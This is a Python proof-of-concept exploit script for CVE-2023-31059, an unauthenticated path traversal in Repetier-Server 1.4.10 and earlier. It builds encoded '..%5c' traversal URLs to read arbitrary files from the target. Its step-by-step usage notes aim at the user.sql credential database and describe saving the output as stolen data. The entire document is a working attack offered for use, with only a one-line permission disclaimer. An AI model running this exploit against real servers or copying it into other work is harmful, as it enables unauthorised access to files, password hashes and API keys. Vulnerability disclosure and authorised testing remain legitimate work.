#!/usr/bin/env python3
# Exploit Title:    Repetier-Server <= 1.4.10 - Unauthenticated Path Traversal / Local File Inclusion
# Exploit Author:   Mohammed Idrees Banyamer
# Vendor Homepage:  https://www.repetier.com/
# Version:          <= 1.4.10
# Tested on:        Windows 10 / Windows Server 2019 (Repetier-Server default install)
# CVE:              CVE-2023-31059
# Advisory:         https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
# CVSS:             9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
#
# Description:
#   Repetier-Server versions up to and including 1.4.10 suffer from an unauthenticated
#   path traversal vulnerability via improper sanitization of filename/path parameters
#   using Windows backslash encoding (..%5c). This allows remote attackers to read
#   arbitrary files from the filesystem, including credential databases (user.sql),
#   configuration files, and system files (win.ini, etc.).
#
# Usage:
#   python3 CVE-2023-31059.py http://target:3344/ --file "ProgramData\\Repetier-Server\\database\\user.sql"
#   python3 CVE-2023-31059.py http://target:3344/ --test
#
# Examples:
#   # Quick test with win.ini
#   python3 CVE-2023-31059.py http://192.168.1.50:3344/ --test
#
#   # Extract user database (most valuable target)
#   python3 CVE-2023-31059.py http://10.10.10.123:3344/ --file "ProgramData\\Repetier-Server\\database\\user.sql" --depth 20
#
# Options:
#   --file        Target file path (Windows style with \\)
#   --depth       Traversal depth (default: 15)
#   --test        Use Windows\\win.ini as test target
#
# Notes:
#   - Works best against Windows-hosted Repetier-Server instances
#   - Default web port is 3344
#   - Increase --depth if the target installation path is deeply nested
#   - Successful exploitation usually leaks bcrypt password hashes, usernames, API keys
#   - No authentication required
#
# How to Use
#
# Step 1: Install required library (if not already present)
#   pip install requests
#
# Step 2: Run a simple test to confirm vulnerability
#   python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
#
# Step 3: If vulnerable, try to extract sensitive files
#   python3 CVE-2023-31059.py http://<target-ip>:3344/ \
#       --file "ProgramData\\Repetier-Server\\database\\user.sql" \
#       --depth 18
#
# Step 4: (Optional) Save output to file for analysis
#   python3 CVE-2023-31059.py http://<target> --file ... > stolen_user.sql


import requests
import argparse
import sys
from urllib.parse import urljoin


def generate_traversal(depth: int = 15) -> str:
    """Generate Windows-style traversal sequence: ..%5c repeated depth times"""
    return "..%5c" * depth


def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
    traversal = generate_traversal(traversal_depth)
    
    payloads = [
        f"views{traversal}{file_path}/base/connectionLost.php",
        f"base/connectionLost.php?file={traversal}{file_path}",
    ]
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print(f"[*] Traversal depth: {traversal_depth}")
    
    for payload in payloads:
        exploit_url = urljoin(target_url.rstrip("/") + "/", payload)
        
        try:
            print(f"  → Trying: {exploit_url}")
            r = requests.get(exploit_url, timeout=timeout, verify=False)
            
            if r.status_code == 200 and len(r.content) > 60:
                sample = r.text[:500].replace("\n", " ").strip()
                print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)")
                print(f"    Preview:\n    {sample}...")
                return True
            else:
                print(f"  → Failed (status {r.status_code}, size {len(r.content)})")
                
        except requests.RequestException as e:
            print(f"  → Error: {e}")
    
    return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2023-31059 PoC - Repetier-Server Path Traversal / LFI"
    )
    parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
    parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql",
                        help="File path to read (use Windows \\ separator)")
    parser.add_argument("--depth", type=int, default=15, help="Traversal depth")
    parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")
    
    args = parser.parse_args()
    
    if args.test:
        args.file = "Windows\\win.ini"
        print("[i] Running test mode → targeting Windows\\win.ini")
    
    file_path = args.file.replace("\\", "%5c")
    
    print("=" * 70)
    print("CVE-2023-31059 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
    print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
    print("=" * 70, "\n")
    
    success = attempt_read(args.target, file_path, args.depth)
    
    if not success:
        print("\n[!] Exploitation attempt failed.")
        print("Suggestions:")
        print("  • Increase --depth (try 18–30)")
        print("  • Verify target is running Repetier-Server <=1.4.10")
        print("  • Try alternative interesting files:")
        print("      - ProgramData%5cRepetier-Server%5cconfig.xml")
        print("      - Windows%5csystem32%5cdrivers%5cetc%5chosts")


if __name__ == "__main__":
    main()